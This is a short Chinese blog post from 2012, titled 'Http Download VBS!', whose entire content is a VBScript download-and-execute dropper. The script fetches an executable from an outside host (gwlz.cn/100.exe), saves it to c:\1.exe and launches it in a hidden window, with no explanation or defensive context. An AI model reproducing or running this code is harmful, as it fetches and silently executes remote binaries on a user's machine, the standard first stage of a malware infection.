现在的位置: 首页 > 综合 > 正文

Http Download VBS!

2012年10月13日 ⁄ 综合 ⁄ 共 304字 ⁄ 字号 评论关闭
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.gwlz.cn/100.exe",0
xPost.Send()
Set sget=createObject("ADODB.Stream")
sget.Mode=3
sget.Type=1   
sget.open
sget.write xpost.responseBody
sget.savetofile "c:\1.exe",2
sget.close
set Q = createobject("shell.application")
Q.ShellExecute "c:\1.exe",open,0
【上篇】
【下篇】

抱歉!评论已关闭.